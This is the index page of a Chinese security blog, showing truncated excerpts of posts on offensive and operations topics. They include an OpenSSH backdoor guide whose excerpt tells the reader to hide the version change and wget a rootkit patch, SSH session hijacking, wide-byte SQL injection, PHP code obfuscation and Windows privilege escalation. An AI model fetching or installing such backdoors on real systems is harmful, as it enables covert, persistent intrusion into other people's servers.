关于openssh通用后门的拓展

发布时间:April 28, 2015 // 3 Comments

from:http://www.freebuf.com/tools/10474.html 简单的说下步骤: 安装前首先 ssh -V 记录下原来ssh版本信息,免得安装后一看就版本不一样了 wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz wget http://o...

阅读更多...

分类:工作日志,VC/C/C++,代码学习,linux

C++ 简单实现HTTP GET/POST 请求

发布时间:April 28, 2015 // No Comments

HTTP(超文本传输协议)是一种客户端与服务端的传输协议,最早用于浏览器和服务器之间的通信,后来因为其使用灵活、方便等特点,广泛用于客户端与服务端的通信。文章将简单介绍HTTP协议,同时以C++方式分别实现HTTP GET、POST 请求 HTTP 请求报文 HTTP请求报文的一般格式由4部分组成:请求行、请求头部、空行、请求数据。如下图所示: 请求行:包含3部分内容:请求方法,U...

阅读更多...

分类:工作日志,VC/C/C++,linux,代码学习,windows,转帖文章

劫持SSH会话注入端口转发

发布时间:April 27, 2015 // No Comments

Hijacking SSH to Inject Port Forwards During red team post exploitation I sometimes run into jump boxes leading to test environments, production servers, DMZs, or other organizational branches. As ...

阅读更多...

分类:工作日志,linux,转帖文章

深入探究宽字节注入漏洞与修补原理

发布时间:April 27, 2015 // No Comments

1、概述 主要是由于使用了宽字节编码造成的。 什么是字符集? 计算机显示的字符图形与保存该字符时的二进制编码的映射关系。 如ASCII中,A(图形)对应编码01000001(65)。 对于MYSQL数据库来说,涉及字符集的地方大致分为存储和传输时,即: (1)存储在服务器端的数据是何种编码 (2)客户端和服务器交互的时候数据传输使用的编码。   2、MYSQL服务...

阅读更多...

分类:PHP,代码学习,转帖文章,mysql

对某个脚本进行的php解密

发布时间:April 27, 2015 // No Comments

晚上客户反映服务器最近流量有些异常,于是就去查看服务器日志,为了自身方便,写了一个文件来查询 <?php $ua_file = "ua.txt"; $ua_data = date("Y/m/d H:i:s")."----".$_SERVER['REMOTE_ADDR']."\n"; ...

阅读更多...

分类:运维工作,PHP,linux,代码学习

php简单加密

发布时间:April 27, 2015 // No Comments

今天看到了eval,gzinflate,base64_decode 这三个函数.可以用来对代码进行加密。保护产权 <?php function encode_file_contents($filename) { $type=strtolower(substr(strrchr($filename,'.'),1)); if('php'...

阅读更多...

分类:PHP,代码学习,转帖文章

从User-Agent判断实现跳转

发布时间:April 27, 2015 // No Comments

最近公司要求XX跳转,就大概写了写。仅供参考。 包含asp php js aspx jsp几个代码。 ASP: <% If isspider() then Response.Status="301 Moved Permanently" Response.AddHeader "Location","http://www.xx.com...

阅读更多...

分类:PHP,转帖文章

Linux VPS自动备份网站数据并发送到邮箱

发布时间:April 26, 2015 // No Comments

最近博客搬到VPS,由于VPS只装了LAMP,没有网站管理面板,备份数据比较麻烦,要用命令打包,再用ftp下载到本地。 于是琢磨着搞个自动化的程序备份数据,下面便是详细的实践步骤。 1、SSH登录到VPS,进入到/home/backup目录,新建文件backup.sh,粘贴如下代码并保存 #!/bin/bash #你要修改的地方从这里开始 MYSQL_USER=数据库用户 MYSQL_...

阅读更多...

分类:工作日志,linux

Windows无界面非交互shell下安装nmap脚本

发布时间:April 26, 2015 // No Comments

有时候由于防火墙的原因只能通过80或1433等其他非交互的环境连接内网机器,而此时你又想探测一下内网的其他机器或是对外扫描所有端口来探测一下防火墙放行的端口这个时候nmap就是一个不二的选择。    Nmap需要Winpcap和Vc库的支持,但Winpcap又必须在窗口界面下安装。最简单的办法就是写个程序发送窗口句柄事件,但这样就会不够灵活等我安装Cain的时...

阅读更多...

分类:转帖文章,windows

提权函数之RtlAdjustPrivilege()

发布时间:April 26, 2015 // No Comments

RtlAdjustPrivilege() 这玩意是在 NTDLL.DLL 里的一个不为人知的函数,MS没有公开,原因就是这玩意实在是太NB了,以至于不需要任何其他函数的帮助,仅凭这一个函数就可以获得进程ACL的任意权限! 下面是函数定义: NTSTATUS RtlAdjustPrivilege ( ULONG Privilege, BOOLEAN Enable, BOOLEAN C...

阅读更多...

分类:工作日志,VC/C/C++,代码学习,转帖文章,windows

分类
最新文章
最近回复
  • 没穿底裤: 最近发现的新版本可以装在LINUX了。但是API有点变化
  • 没穿底裤: 暂时好像没有看到这个功能.
  • 没穿底裤: 这个只是一个分析,并不是使用方法哟
  • 没穿底裤: 抱歉,很久没有打理了。会不会你使用的是12版本。目前还没有遇到过这种情况
  • bao song: http://0cx.cc/php_decode_shell.jspx 这个怎么用,代码提示...
归档
友情链接